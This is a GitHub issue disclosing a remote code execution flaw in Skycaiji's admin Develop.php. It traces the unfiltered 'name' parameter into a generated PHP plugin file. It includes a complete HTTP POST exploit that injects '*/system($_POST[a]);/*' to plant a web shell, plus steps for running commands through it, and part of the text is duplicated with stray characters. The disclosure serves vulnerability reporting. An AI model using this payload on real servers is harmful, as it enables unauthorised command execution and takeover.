Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Location: /SkycaijiApp/admin/controller/Develop.php#L707#funcAction()
Code:
... else{ $module=input('module'); $copyright=input('copyright'); $identifier=input('identifier'); $name=input('name'); $methods=input('methods/a',array()); if(empty($module)){ $this->error('请选择类型'); } $module=$mfuncApp->format_module($module); $copyright=$mfuncApp->format_copyright($copyright); $identifier=$mfuncApp->format_identifier($identifier); if(!$mfuncApp->right_module($module)){ $this->error('类型错误'); } if(!$mfuncApp->right_identifier($identifier)){ $this->error('功能标识只能由字母或数字组成,且首个字符必须是字母!'); } if(!$mfuncApp->right_copyright($copyright)){ $this->error('作者版权只能由字母或数字组成,且首个字符必须是字母!'); } $newMethods=array(); foreach ($methods['method'] as $k=>$v){ if(preg_match('/^[a-z\_]\w*/',$v)){ foreach ($methods as $mk=>$mv){ $newMethods[$mk][$k]=$mv[$k]; } } } $methods=$newMethods; unset($newMethods); if(empty($methods['method'])){ $this->error('请添加方法!'); } $app=$mfuncApp->app_name($copyright,$identifier); $id=$mfuncApp->createApp($module,$app,array('name'=>$name,'methods'=>$methods)); if($id>0){ $this->success('创建成功','Develop/func?app='.$app); }else{ $this->error('创建失败'); } } } ....
Vulnerability key code:
$app=$mfuncApp->app_name($copyright,$identifier); $id=$mfuncApp->createApp($module,$app,array('name'=>$name,'methods'=>$methods));`
� follow up $mfuncApp->app_name Concatenate $copyright, $identifier directly, then return. Go back to $id=$mfuncApp->createApp($module,$app,array('name'=>$name,'methods'=>$methods));
$id=$mfuncApp->createApp($module,$app,array('name'=>$name,'methods'=>$methods));
follow up $mfuncApp->createApp
$module,$app,array('name'=>$name,'methods'=>$methods)
And the parameters we can control,follow up $funcFile=$this->filename($module,$app);
$funcFile=$this->filename($module,$app);
Return directly after splicing
Continue back to the createApp function
There is no filter /* and */ for variables $name /plugin/func/$module/$copyright$identifier.php
Exp is constructed directly here:
POST /index.php?s=/Admin/Develop/func HTTP/1.1 Host: 172.16.49.3:50004 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:98.0) Gecko/20100101 Firefox/98.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 179 Origin: http://172.16.49.3:50004 Connection: close Referer: http://172.16.49.3:50004/index.php?s=/admin/Develop/func Cookie: PHPSESSID=o7c4tlckirjijmciq20ivi0cv4; login_history=3%7C6a03060e5e6600124dab098dfed314df _usertoken_=94701bbd27956c7d922c079da883c68f&module=downloadImg&name=*/system($_POST[a]);/*&identifier=a11©right=b1&methods%5Bmethod%5D%5B%5D=a12&methods%5Bcomment%5D%5B%5D=11
check the file
Visit /plugin/func/downloadImg/A11B1.php post: a=command
The text was updated successfully, but these errors were encountered:
Sorry, something went wrong.
No branches or pull requests
Vulnerability conditions
Vulnerability details
Location: /SkycaijiApp/admin/controller/Develop.php#L707#funcAction()
Code:
Vulnerability key code:
�

follow up $mfuncApp->app_name
Concatenate $copyright, $identifier directly, then return.
Go back to
$id=$mfuncApp->createApp($module,$app,array('name'=>$name,'methods'=>$methods));follow up $mfuncApp->createApp
$module,$app,array('name'=>$name,'methods'=>$methods)And the parameters we can control,follow up

$funcFile=$this->filename($module,$app);Return directly after splicing
Continue back to the createApp function

There is no filter /* and */ for variables $name
/plugin/func/$module/$copyright$identifier.php
Exp is constructed directly here:
check the file
Visit /plugin/func/downloadImg/A11B1.php

post: a=command
The text was updated successfully, but these errors were encountered: